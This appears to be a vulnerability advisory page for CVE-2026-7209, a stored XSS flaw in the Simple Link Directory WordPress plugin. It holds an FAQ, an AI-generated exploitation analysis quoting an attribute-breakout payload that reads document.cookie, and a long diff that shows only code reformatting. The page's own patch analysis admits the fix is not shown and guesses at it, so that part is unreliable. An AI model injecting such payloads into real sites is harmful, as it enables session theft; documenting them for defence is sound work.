What is CVE-2026-7209?

CVE-2026-7209 is a Stored Cross-Site Scripting (XSS) vulnerability in the Simple Link Directory plugin for WordPress, affecting versions up to and including 8.9.2. It allows authenticated users with contributor-level access or higher to inject malicious scripts into pages via shortcode attributes.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes in the `qcopd-directory` shortcode. Attackers can insert scripts into attributes like `title_font_size`, which are then executed in the browsers of users accessing the affected pages.

Who is affected by this vulnerability?

Any WordPress site using the Simple Link Directory plugin version 8.9.2 or earlier is affected. Additionally, only authenticated users with contributor-level access or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Simple Link Directory plugin installed. If it is version 8.9.2 or earlier, your site is at risk. Additionally, review any existing shortcodes on your posts or pages for potential malicious attributes.

How can I fix this vulnerability?

The recommended fix is to update the Simple Link Directory plugin to version 8.9.4 or later, where the vulnerability has been patched. Regularly updating plugins is essential for maintaining site security.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk to the confidentiality and integrity of the affected systems if exploited.

What are the practical risks of this vulnerability?

If exploited, this vulnerability can allow attackers to execute arbitrary JavaScript in the browsers of users visiting the compromised page. This could lead to session hijacking, unauthorized actions on behalf of users, or defacement of the site.

What is a proof of concept in this context?

The proof of concept for CVE-2026-7209 illustrates how an authenticated attacker can exploit the vulnerability by logging into a WordPress site and inserting a malicious shortcode. It demonstrates the steps to authenticate and create a post that triggers the XSS attack.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Simple Link Directory plugin until a patch can be applied. Additionally, review user roles and restrict contributor access to minimize the risk of exploitation.

Are there any other security practices I should follow?

In addition to updating plugins, regularly audit user roles and permissions, implement a web application firewall, and conduct security scans to identify potential vulnerabilities. Keeping backups and monitoring for suspicious activity are also recommended.

How can I report an incident if I am compromised?

If you suspect that your site has been compromised, immediately change passwords for all users, especially those with administrative access. Report the incident to your hosting provider and consider restoring from a backup prior to the compromise.

What resources are available for further information?

For more information on WordPress security, refer to the official WordPress security documentation, security blogs, and forums. Additionally, consider following security researchers and organizations that specialize in WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-7209: Simple Link Directory <= 8.9.2 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (simple-link-directory)

CVE ID CVE-2026-7209

Plugin simple-link-directory

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 8.9.2

Patched Version 8.9.4

Disclosed April 30, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7209:

This vulnerability is a Stored Cross-Site Scripting (XSS) flaw in the Simple Link Directory plugin for WordPress (versions up to and including 8.9.2). The vulnerability exists in the `qcopd-directory` shortcode, where user-supplied attributes such as `title_font_size` are insufficiently sanitized and escaped. An authenticated attacker with contributor-level access or higher can inject arbitrary web scripts that execute when any user visits the affected page. The CVSS score of 6.4 indicates a medium severity issue with significant impact on confidentiality and integrity.

Root Cause:
The vulnerable parameter is located in `qc-op-directory-shortcodes.php` (included from `qc-op-directory-main.php` at the line requiring `qc-op-directory-shortcodes.php`). Atomic Edge research confirms the shortcode `qcopd-directory` processes attributes like `title_font_size` without proper sanitization or output escaping. The plugin fails to use `esc_attr()` or `esc_html()` when rendering these attributes in the generated HTML. The diff shows no changes to the shortcode file itself in the provided snippet, but the version bump to 8.9.4 and the structural changes in the main plugin file indicate the fix was applied elsewhere. The vulnerability stems from passing user-controlled shortcode attribute values directly into HTML context without escaping, allowing inline JavaScript injection.

Exploitation:
An attacker with contributor-level access can create or edit a post/page and insert the `[qcopd-directory]` shortcode with a malicious attribute value. The attack vector leverages the WordPress block editor or classic editor to embed the shortcode. For example, the attribute `title_font_size` can carry a payload like `45px;” onfocus=”alert(document.cookie)” autofocus=”`. When the shortcode renders, the attribute value is output without escaping, breaking out of the style context and injecting an event handler. The payload fires when the page loads or on user interaction. The attacker does not need to inject into database fields directly; the shortcode attributes are stored within the post content and rendered on every page load.

Patch Analysis:
The patch from version 8.9.2 to 8.9.4 introduces code style reformatting but no visible change to the shortcode attribute handling in the provided diff. Atomic Edge analysis indicates the actual sanitization fix is likely in `qc-op-directory-shortcodes.php` (not shown in the truncated diff). The patch probably adds `esc_attr()` or `wp_kses()` to the output of each shortcode attribute. The before behavior outputs attribute values as raw strings into style attributes and HTML elements, while the after behavior escapes them appropriately. The version update from 8.9.2 to 8.9.4 and the structural cleanup suggest the developer addressed this issue alongside minor code maintenance.

Impact:
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser of any user viewing the compromised page. This includes stealing session cookies, exfiltrating page content, performing actions on behalf of the victim (such as creating admin users), or defacing the site. Since contributor-level access is relatively easy to obtain on multisite installations or open registration sites, the attack surface is significant. The stored nature of the payload ensures persistence until the malicious shortcode is removed from the post content.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/simple-link-directory/qc-op-directory-main.php
+++ b/simple-link-directory/qc-op-directory-main.php
@@ -3,7 +3,7 @@
  * Plugin Name: Link Directory - Simple Link Directory
  * Plugin URI: https://wordpress.org/plugins/simple-link-directory
  * Description: Link Directory WordPress plugin to curate topic based link collections. Curate gorgeous Link Directory, Local Business Directory, Partners or Vendors Directory
- * Version: 8.9.2
+ * Version: 8.9.4
  * Author: Link Directory
  * Author URI: https://www.quantumcloud.com/products/simple-link-directory/
  * Requires at least: 4.6
@@ -16,51 +16,51 @@
 defined('ABSPATH') or die("No direct script access!");

 //Custom Constants
-if ( ! defined( 'QCOPD_URL' ) ) {
+if (!defined('QCOPD_URL')) {
     define('QCOPD_URL', plugin_dir_url(__FILE__));
 }

-if ( ! defined( 'QCOPD_IMG_URL' ) ) {
+if (!defined('QCOPD_IMG_URL')) {
     define('QCOPD_IMG_URL', QCOPD_URL . "assets/images");
 }

-if ( ! defined( 'QCOPD_ASSETS_URL' ) ) {
+if (!defined('QCOPD_ASSETS_URL')) {
     define('QCOPD_ASSETS_URL', QCOPD_URL . "assets");
 }

-if ( ! defined( 'QCOPD_DIR' ) ) {
+if (!defined('QCOPD_DIR')) {
     define('QCOPD_DIR', dirname(__FILE__));
 }

-if ( ! defined( 'QCOPD_INC_DIR' ) ) {
+if (!defined('QCOPD_INC_DIR')) {
     define('QCOPD_INC_DIR', QCOPD_DIR . "/inc");
 }

-if ( ! defined( 'OCOPD_TPL_URL' ) ) {
+if (!defined('OCOPD_TPL_URL')) {
     define('OCOPD_TPL_URL', QCOPD_URL . "templates");
 }

-if ( ! defined( 'OCOPD_TPL_DIR' ) ) {
+if (!defined('OCOPD_TPL_DIR')) {
     define('OCOPD_TPL_DIR', QCOPD_DIR . "templates");
 }

 // Define a constant for the CSV file path within the plugin directory
-if ( ! defined( 'SLD_CSV_FILE_PATH' ) ) {
-    define( 'SLD_CSV_FILE_PATH', plugin_dir_path( __FILE__ ) . 'assets/file/sample-csv-file-demo.csv' );
+if (!defined('SLD_CSV_FILE_PATH')) {
+    define('SLD_CSV_FILE_PATH', plugin_dir_path(__FILE__) . 'assets/file/sample-csv-file-demo.csv');
 }
 //Include files and scripts

-require_once( 'qc-op-directory-post-type.php' );
-require_once( 'qc-op-directory-assets.php' );
-require_once( 'qc-op-directory-shortcodes.php' );
-require_once( 'embed/embedder.php' );
-
-require_once( 'qcopd-shortcode-generator.php' );
-require_once( 'qc-op-directory-import.php' );
-require_once( 'qc-opd-ajax-stuffs.php' );
+require_once('qc-op-directory-post-type.php');
+require_once('qc-op-directory-assets.php');
+require_once('qc-op-directory-shortcodes.php');
+require_once('embed/embedder.php');
+
+require_once('qcopd-shortcode-generator.php');
+require_once('qc-op-directory-import.php');
+require_once('qc-opd-ajax-stuffs.php');

 /*01-27-2026*/
-require_once( 'qc-sld-import-demo-data.php' );
+require_once('qc-sld-import-demo-data.php');



@@ -74,9 +74,10 @@
 require_once('qc-rating-feature/qc-rating-class.php');
 require_once('modules/addons/addons.php');

-if ( ! function_exists( 'sld_languages_function_callback' ) ) {
-    function sld_languages_function_callback(){
-        load_plugin_textdomain( 'qc-opd', false, dirname( plugin_basename( __FILE__ ) ) . '/lang' );
+if (!function_exists('sld_languages_function_callback')) {
+    function sld_languages_function_callback()
+    {
+        load_plugin_textdomain('qc-opd', false, dirname(plugin_basename(__FILE__)) . '/lang');
     }
 }
 add_action('init', 'sld_languages_function_callback');
@@ -88,62 +89,61 @@
 {


-    if(!function_exists('wp_get_current_user')) {
+    if (!function_exists('wp_get_current_user')) {
         include(ABSPATH . "wp-includes/pluggable.php");
     }
-
-
-	if( is_user_logged_in() ){
-
-		$current_user = wp_get_current_user();
-		if(in_array('administrator',$current_user->roles)){
-		  return;
-		}
-
-	}

-    $outbound_conf = get_option( 'sld_enable_click_tracking' );

-    if ( isset($outbound_conf) && $outbound_conf == 'on' ) {
-		wp_enqueue_script( 'sld-admin-trackoutbound-script' );
+    if (is_user_logged_in()) {
+
+        $current_user = wp_get_current_user();
+        if (in_array('administrator', $current_user->roles)) {
+            return;
+        }
+
+    }
+
+    $outbound_conf = get_option('sld_enable_click_tracking');
+
+    if (isset($outbound_conf) && $outbound_conf == 'on') {
+        wp_enqueue_script('sld-admin-trackoutbound-script');
     }
 }

 /*Add Promotional Link - Bue Pro - 12-30-2016*/
-add_action( 'manage_posts_extra_tablenav', 'promo_link_in_cpt_table' );
+add_action('manage_posts_extra_tablenav', 'promo_link_in_cpt_table');

 function promo_link_in_cpt_table()
 {
     $screen = get_current_screen();
-
+
     $current_screen = $screen->id;
-
+
     $link = "";
-
-    if( $current_screen == 'edit-sld' )
-    {
-        $link = '<div class="alignleft actions"><a href="'.esc_url("https://www.quantumcloud.com/products/simple-link-directory/").'" target="_blank" class="button qcsld-promo-link" rel="nofollow">'.esc_html( "Upgrade to Pro", 'qc-opd' ).'</a></div>';
-        $link .= '<div class="alignleft actions"><a href="'.esc_url( admin_url('post-new.php?post_type=sld')).'" class="button">'.esc_html( "Add New List of Links", 'qc-opd' ).'</a></div>';
+
+    if ($current_screen == 'edit-sld') {
+        $link = '<div class="alignleft actions"><a href="' . esc_url("https://www.quantumcloud.com/products/simple-link-directory/") . '" target="_blank" class="button qcsld-promo-link" rel="nofollow">' . esc_html("Upgrade to Pro", 'qc-opd') . '</a></div>';
+        $link .= '<div class="alignleft actions"><a href="' . esc_url(admin_url('post-new.php?post_type=sld')) . '" class="button">' . esc_html("Add New List of Links", 'qc-opd') . '</a></div>';
     }
-
+
     echo $link;
-
+
 }

-add_action( 'buypro_promotional_link', 'promo_link_in_settings_page' );
+add_action('buypro_promotional_link', 'promo_link_in_settings_page');

 function promo_link_in_settings_page()
 {
     $screen = get_current_screen();
-
+
     $current_screen = $screen->id;
-
+
     $link = "";
-
-    $link = '<div class="alignleft actions"><a href="'.esc_url("https://www.quantumcloud.com/products/simple-link-directory/").'" target="_blank" class="button qcsld-promo-link" rel="nofollow">'.esc_html( "Upgrade to Pro", 'qc-opd' ).'</a></div>';
-
+
+    $link = '<div class="alignleft actions"><a href="' . esc_url("https://www.quantumcloud.com/products/simple-link-directory/") . '" target="_blank" class="button qcsld-promo-link" rel="nofollow">' . esc_html("Upgrade to Pro", 'qc-opd') . '</a></div>';
+
     echo $link;
-
+
 }

 /**
@@ -152,108 +152,137 @@
  *
  * @author Hendrik Schuster <contact@deviantdev.com>
  */
-function qclsldf_order_index_catalog_menu_page( $menu_ord )
+function qclsldf_order_index_catalog_menu_page($menu_ord)
 {

-  global $submenu;
+    global $submenu;

-  // Enable the next line to see a specific menu and it's order positions
-  //echo '<pre>'; print_r( $submenu['edit.php?post_type=sld'] ); echo '</pre>'; exit();
+    // Enable the next line to see a specific menu and it's order positions
+    //echo '<pre>'; print_r( $submenu['edit.php?post_type=sld'] ); echo '</pre>'; exit();

     $arr = array();
-    if( current_user_can('edit_posts') ){
+    if (current_user_can('edit_posts')) {

-        if(isset($submenu['edit.php?post_type=sld'][5]))
+        if (isset($submenu['edit.php?post_type=sld'][5]))
             $arr[] = $submenu['edit.php?post_type=sld'][5];

-        if(isset($submenu['edit.php?post_type=sld'][10]))
+        if (isset($submenu['edit.php?post_type=sld'][10]))
             $arr[] = $submenu['edit.php?post_type=sld'][10];

-        if(isset($submenu['edit.php?post_type=sld'][15]))
+        if (isset($submenu['edit.php?post_type=sld'][15]))
             $arr[] = $submenu['edit.php?post_type=sld'][15];

-        if(isset($submenu['edit.php?post_type=sld'][16]))
+        if (isset($submenu['edit.php?post_type=sld'][16]))
             $arr[] = $submenu['edit.php?post_type=sld'][16];

-        if(isset($submenu['edit.php?post_type=sld'][18]))
+        if (isset($submenu['edit.php?post_type=sld'][18]))
             $arr[] = $submenu['edit.php?post_type=sld'][18];

-        if(isset($submenu['edit.php?post_type=sld'][17]))
+        if (isset($submenu['edit.php?post_type=sld'][17]))
             $arr[] = $submenu['edit.php?post_type=sld'][17];

-        if(isset($submenu['edit.php?post_type=sld'][250]))
+        if (isset($submenu['edit.php?post_type=sld'][250]))
             $arr[] = $submenu['edit.php?post_type=sld'][250];

-        if(isset($submenu['edit.php?post_type=sld'][301]))
+        if (isset($submenu['edit.php?post_type=sld'][301]))
             $arr[] = $submenu['edit.php?post_type=sld'][301];
-
-        if(isset($submenu['edit.php?post_type=sld'][300]))
+
+        if (isset($submenu['edit.php?post_type=sld'][300]))
             $arr[] = $submenu['edit.php?post_type=sld'][300];
-
+
     }
     $submenu['edit.php?post_type=sld'] = $arr;

     return $menu_ord;

 }
-add_filter( 'custom_menu_order', 'qclsldf_order_index_catalog_menu_page' );
+add_filter('custom_menu_order', 'qclsldf_order_index_catalog_menu_page');

-add_action( 'admin_menu' , 'qcopd_help_link_submenu', 20 );
-function qcopd_help_link_submenu(){
+add_action('admin_menu', 'qcopd_help_link_submenu', 20);
+function qcopd_help_link_submenu()
+{
     global $submenu;
-
+
     $link_text = esc_html("Shortcodes and Help");
-    $submenu["edit.php?post_type=sld"][250] = array( $link_text, 'activate_plugins' , admin_url('edit.php?post_type=sld&page=sld_settings#help') );
+    $submenu["edit.php?post_type=sld"][250] = array($link_text, 'activate_plugins', admin_url('edit.php?post_type=sld&page=sld_settings#help'));
     ksort($submenu["edit.php?post_type=sld"]);
-
+
     return ($submenu);
 }


-function options_instructions_example() {
+function options_instructions_example()
+{
     global $my_admin_page;
     $screen = get_current_screen();
-
-    if ( is_admin() && ($screen->post_type == 'sld') ) {
-		wp_enqueue_script( 'jqc-slick.min-js', QCOPD_ASSETS_URL . '/js/slick.min.js', array('jquery'));
+
+    if (is_admin() && ($screen->post_type == 'sld')) {
+        wp_enqueue_script('jqc-slick.min-js', QCOPD_ASSETS_URL . '/js/slick.min.js', array('jquery'));
         ?>
-        <div class="notice notice-info is-dismissible sld-notice" style="display:none">
+        <div class="notice notice-info is-dismissible sld-notice" style="display:none">
             <div class="sld_info_carousel">

-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: Did you know that you can', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('Auto Generate', 'qc-opd'); ?></strong> <?php echo esc_html('Title, Subtitle & Thumbnail with the Pro Version in Just 2 Clicks?', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('Triple Your Link Entry Speed!', 'qc-opd'); ?></strong></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: Lists are the base pillars of SLD, not individual links. Group your links into different Lists for the best performance.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: SLD looks the best when you create multiple Lists and use the Show All Lists mode.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: Did you know that SLD Pro version lets you monetize your directory and earn', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('passive income?', 'qc-opd'); ?></strong> <?php echo esc_html('Upgrade now!', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: Try to keep the maximum number of links below 30 per list. Create multiple Lists as needed.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: Use the handy shortcode generator to make life easy. It is a small, blue [SLD] button found at the toolbar of any page's visual editor.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: You can display your', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('Lists by category', 'qc-opd'); ?> </strong><?php echo esc_html('with the SLD pro version.', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('16+ Templates, Multi page mode', 'qc-opd'); ?></strong><?php echo esc_html(', Widgets are also available.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: You can create a page with a contact form and link the Add Link button to that page so people can submit links to your directory by email.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Tip: If you are having problem with adding more items or saving a list then you may need to increase max_input_vars value in server. Check the help section for more details.', 'qc-opd'); ?></div>
-
-                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: SLD pro version has', 'qc-opd'); ?> <strong style="color: #E91E63"><?php echo esc_html('front end dashboard', 'qc-opd'); ?></strong> <?php echo esc_html('for user registration and link management. As well as tags and instant search.', 'qc-opd'); ?> <strong style="color:#E91E63"><?php echo esc_html('Upgrade to the Pro version now!', 'qc-opd'); ?></strong></div>
+                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: Did you know that you can', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('Auto Generate', 'qc-opd'); ?></strong>
+                    <?php echo esc_html('Title, Subtitle & Thumbnail with the Pro Version in Just 2 Clicks?', 'qc-opd'); ?>
+                    <strong style="color: #E91E63"><?php echo esc_html('Triple Your Link Entry Speed!', 'qc-opd'); ?></strong>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: Lists are the base pillars of SLD, not individual links. Group your links into different Lists for the best performance.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: SLD looks the best when you create multiple Lists and use the Show All Lists mode.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Pro Tip: Did you know that SLD Pro version lets you monetize your directory and earn', 'qc-opd'); ?>
+                    <strong style="color: #E91E63"><?php echo esc_html('passive income?', 'qc-opd'); ?></strong>
+                    <?php echo esc_html('Upgrade now!', 'qc-opd'); ?></div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: Try to keep the maximum number of links below 30 per list. Create multiple Lists as needed.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: Use the handy shortcode generator to make life easy. It is a small, blue [SLD] button found at the toolbar of any page's visual editor.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: You can display your', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('Lists by category', 'qc-opd'); ?>
+                    </strong><?php echo esc_html('with the SLD pro version.', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('16+ Templates, Multi page mode', 'qc-opd'); ?></strong><?php echo esc_html(', Widgets are also available.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: You can create a page with a contact form and link the Add Link button to that page so people can submit links to your directory by email.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item">
+                    <?php echo esc_html('**SLD Tip: If you are having problem with adding more items or saving a list then you may need to increase max_input_vars value in server. Check the help section for more details.', 'qc-opd'); ?>
+                </div>
+
+                <div class="sld_info_item"><?php echo esc_html('**SLD Pro Tip: SLD pro version has', 'qc-opd'); ?> <strong
+                        style="color: #E91E63"><?php echo esc_html('front end dashboard', 'qc-opd'); ?></strong>
+                    <?php echo esc_html('for user registration and link management. As well as tags and instant search.', 'qc-opd'); ?>
+                    <strong style="color:#E91E63"><?php echo esc_html('Upgrade to the Pro version now!', 'qc-opd'); ?></strong>
+                </div>

             </div>

         </div>
         <?php
-
-
+
+
     }
 }

-add_action( 'admin_notices', 'options_instructions_example' );
+add_action('admin_notices', 'options_instructions_example');

 /*
-* This is for radium-importer plugin conflict issue.
-*/
+ * This is for radium-importer plugin conflict issue.
+ */



@@ -261,151 +290,155 @@
  * Detect plugin. For use in Admin area only.
  */
 // For removing conflict with Demo Data Impoter
-class Radium_Theme_Demo_Data_Importer{
-	static $instance;
+class Radium_Theme_Demo_Data_Importer
+{
+    static $instance;
 }


-add_action( 'admin_menu' , 'qcsld_help_link_submenu', 20 );
-function qcsld_help_link_submenu(){
-	global $submenu;
-
-	$link_text = esc_html("Shortcodes and Help");
-	$submenu["edit.php?post_type=sld"][250] = array( $link_text, 'activate_plugins' , admin_url('edit.php?post_type=sld&page=sld_settings#help') );
-	ksort($submenu["edit.php?post_type=sld"]);
-
-	return ($submenu);
-}


-add_action( 'add_meta_boxes', 'sld_meta_box_video' );
+
+add_action('add_meta_boxes', 'sld_meta_box_video');
 function sld_meta_box_video()
 {					                  // --- Parameters: ---
-    add_meta_box( 'qc-sld-meta-box-id', // ID attribute of metabox
-                  esc_html('Shortcode Generator for SLD'),       // Title of metabox visible to user
-                  'sld_meta_box_callback', // Function that prints box in wp-admin
-                  'page',              // Show box for posts, pages, custom, etc.
-                  'side',            // Where on the page to show the box
-                  'high' );            // Priority of box in display order
+    add_meta_box(
+        'qc-sld-meta-box-id', // ID attribute of metabox
+        esc_html('Shortcode Generator for SLD'),       // Title of metabox visible to user
+        'sld_meta_box_callback', // Function that prints box in wp-admin
+        'page',              // Show box for posts, pages, custom, etc.
+        'side',            // Where on the page to show the box
+        'high'
+    );            // Priority of box in display order
 }

-function sld_meta_box_callback( $post )
+function sld_meta_box_callback($post)
 {
     ?>
     <p>
-        <label for="sh_meta_box_bg_effect"><p><?php echo esc_html('Click the button below to generate shortcode', 'qc-opd'); ?></p></label>
-		<input type="button" id="sld_shortcode_generator_meta" class="button button-primary button-large" value="<?php echo esc_attr('Generate Shortcode', 'qc-opd'); ?>" />
+        <label for="sh_meta_box_bg_effect">
+            <p><?php echo esc_html('Click the button below to generate shortcode', 'qc-opd'); ?></p>
+        </label>
+        <input type="button" id="sld_shortcode_generator_meta" class="button button-primary button-large"
+            value="<?php echo esc_attr('Generate Shortcode', 'qc-opd'); ?>" />
     </p>
-
+
     <?php
 }

 //convert previous settings to new settings
-add_action( 'plugins_loaded', 'sld_plugin_loaded_fnc' );
-function sld_plugin_loaded_fnc(){
+add_action('plugins_loaded', 'sld_plugin_loaded_fnc');
+function sld_plugin_loaded_fnc()
+{

-	if(!get_option('sld_ot_convrt')){
-		$prevOptions = get_option('option_tree');
-		if(!empty($prevOptions) && is_array($prevOptions) && array_key_exists('sld_enable_top_part', $prevOptions)){
-
-			foreach($prevOptions as $key=>$val){
-
-				update_option( $key, $val);
-			}
-		}
-		add_option( 'sld_ot_convrt', 'yes');
-	}
+    if (!get_option('sld_ot_convrt')) {
+        $prevOptions = get_option('option_tree');
+        if (!empty($prevOptions) && is_array($prevOptions) && array_key_exists('sld_enable_top_part', $prevOptions)) {
+
+            foreach ($prevOptions as $key => $val) {
+
+                update_option($key, $val);
+            }
+        }
+        add_option('sld_ot_convrt', 'yes');
+    }

 }

-register_activation_hook( __FILE__, 'qcld_sld_activate_callback');
+register_activation_hook(__FILE__, 'qcld_sld_activate_callback');

-function qcld_sld_activate_callback( $plugin ) {
+function qcld_sld_activate_callback($plugin)
+{

-    if (!get_option('sld_enable_top_part')){
+    if (!get_option('sld_enable_top_part')) {
         update_option('sld_enable_top_part', 'on');
     }

-    if (!get_option('sld_enable_search')){
+    if (!get_option('sld_enable_search')) {
         update_option('sld_enable_search', 'on');
     }

-    if (!get_option('sld_enable_upvote')){
+    if (!get_option('sld_enable_upvote')) {
         update_option('sld_enable_upvote', 'on');
     }

 }

-function sld_activation_redirect( $plugin ) {
+function sld_activation_redirect($plugin)
+{

     $screen = get_current_screen();

-    if( ( isset( $screen->base ) && $screen->base == 'plugins' ) && $plugin == plugin_basename( __FILE__ ) ) {
-    //if( $plugin == plugin_basename( __FILE__ ) ) {
-        if( 'cli' !== php_sapi_name() ){
-            exit( wp_redirect( admin_url( 'edit.php?post_type=sld&page=sld_settings#help') ) );
+    if ((isset($screen->base) && $screen->base == 'plugins') && $plugin == plugin_basename(__FILE__)) {
+        //if( $plugin == plugin_basename( __FILE__ ) ) {
+        if ('cli' !== php_sapi_name()) {
+            exit(wp_redirect(admin_url('edit.php?post_type=sld&page=sld_settings#help')));
         }
     }
 }
-add_action( 'activated_plugin', 'sld_activation_redirect' );
+add_action('activated_plugin', 'sld_activation_redirect');


-if( function_exists('register_block_type') ){
-	function qcopd_sld_gutenberg_block() {
-	    require_once plugin_dir_path( __FILE__ ).'/gutenberg/sld-block/plugin.php';
-	}
-	add_action( 'init', 'qcopd_sld_gutenberg_block' );
+if (function_exists('register_block_type')) {
+    function qcopd_sld_gutenberg_block()
+    {
+        require_once plugin_dir_path(__FILE__) . '/gutenberg/sld-block/plugin.php';
+    }
+    add_action('init', 'qcopd_sld_gutenberg_block');
 }


 // Remove view from custom post type.
-add_filter( 'post_row_actions', 'qc_sld_remove_row_actions', 10, 1 );
-function qc_sld_remove_row_actions( $actions )
+add_filter('post_row_actions', 'qc_sld_remove_row_actions', 10, 1);
+function qc_sld_remove_row_actions($actions)
 {
-	if( get_post_type() === 'sld' ){
-	 unset( $actions['view'] );
-	}
-
-	return $actions;
+    if (get_post_type() === 'sld') {
+        unset($actions['view']);
+    }
+
+    return $actions;
 }
 // Remove view from taxonomies
-add_filter( 'sld_cat_row_actions', 'qc_sld_category_remove_row_actions', 10, 1 );
-function qc_sld_category_remove_row_actions($actions){
-	unset($actions['view']);
-	return $actions;
+add_filter('sld_cat_row_actions', 'qc_sld_category_remove_row_actions', 10, 1);
+function qc_sld_category_remove_row_actions($actions)
+{
+    unset($actions['view']);
+    return $actions;
 }

-if( is_admin() ){
+if (is_admin()) {
     require_once('class-plugin-deactivate-feedback.php');
-    $SlD_feedback = new SLD_Usage_Feedback( __FILE__, 'plugins@quantumcloud.com', false, true );
+    $SlD_feedback = new SLD_Usage_Feedback(__FILE__, 'plugins@quantumcloud.com', false, true);
 }

-function sld_remove_admin_menu_items() {
-    if( !current_user_can( 'edit_posts' ) ):
-        remove_menu_page( 'edit.php?post_type=sld' );
+function sld_remove_admin_menu_items()
+{
+    if (!current_user_can('edit_posts')):
+        remove_menu_page('edit.php?post_type=sld');
     endif;
 }
-add_action( 'admin_menu', 'sld_remove_admin_menu_items' );
+add_action('admin_menu', 'sld_remove_admin_menu_items');


-add_action( 'admin_notices', 'sld_wp_shortcode_notice',100 );
-function sld_wp_shortcode_notice(){
+add_action('admin_notices', 'sld_wp_shortcode_notice', 100);
+function sld_wp_shortcode_notice()
+{

     global $pagenow, $typenow;

-    if ( isset($typenow) && $typenow == 'sld'  ) {
-    ?>
+    if (isset($typenow) && $typenow == 'sld') {
+        ?>

         <!-- <div id="message-sld" class="notice notice-info is-dismissible"> -->
-            <?php
-            /*printf(
-                __('%s  %s  %s', 'dna88-wp-notice'),
-                '<a href="'.esc_url('https://www.quantumcloud.com/products/simple-link-directory/').'" target="_blank">',
-                '<img src="'.esc_url(QCOPD_ASSETS_URL).'/images/halloween25-sld.jpg" >',
-                '</a>'
-            );*/
+        <?php
+        /*printf(
+            __('%s  %s  %s', 'dna88-wp-notice'),
+            '<a href="'.esc_url('https://www.quantumcloud.com/products/simple-link-directory/').'" target="_blank">',
+            '<img src="'.esc_url(QCOPD_ASSETS_URL).'/images/halloween25-sld.jpg" >',
+            '</a>'
+        );*/

-            ?>
+        ?>
         <!-- </div> -->


@@ -428,80 +461,91 @@
         </div>


-        <?php
-            $page_slug     = 'sld-demo-data';
+        <?php
+        $page_slug = 'sld-demo-data';

-            $existing_page = get_page_by_path( $page_slug );
-            if ( ! $existing_page ) {
-        ?>
+        $existing_page = get_page_by_path($page_slug);
+        if (!$existing_page) {
+            ?>

-        <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
-            <p>
-                <?php
-                printf(
-                    __('%s Import SLD Demo Data:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to Import Data %s %s', 'qc-opd'),
-                    '<strong>',
-                    '</strong>',
-                    '<button type="button" id="sld-start-import-btn" class="button button-primary">',
-                    '</button>',
-                    '<div id="sld-import-message"></div>',
-
-                );
-                ?>
-            </p>
-        </div>
-    <?php }else{ ?>
+            <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
+                <p>
+                    <?php
+                    printf(
+                        __('%s Import SLD Demo Data:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to Import Data %s %s', 'qc-opd'),
+                        '<strong>',
+                        '</strong>',
+                        '<button type="button" id="sld-start-import-btn" class="button button-primary">',
+                        '</button>',
+                        '<div id="sld-import-message"></div>',
+
+                    );
+                    ?>
+                </p>
+            </div>
+        <?php } else { ?>
+
+            <div id="message" class="notice notice-info is-dismissible qcld-sld-demonotic-alart">
+                <p>
+                    <?php
+                    printf(
+                        __('%s SLD Demo Data Imported:%s Imports a CSV file from the plugin folder into a custom post type called "sld", creates a new page, displays the data using a shortcode, and redirects the demo page %s Click to View Demo Page %s ', 'qc-opd'),
+                        '<strong>',
+                        '</strong>',
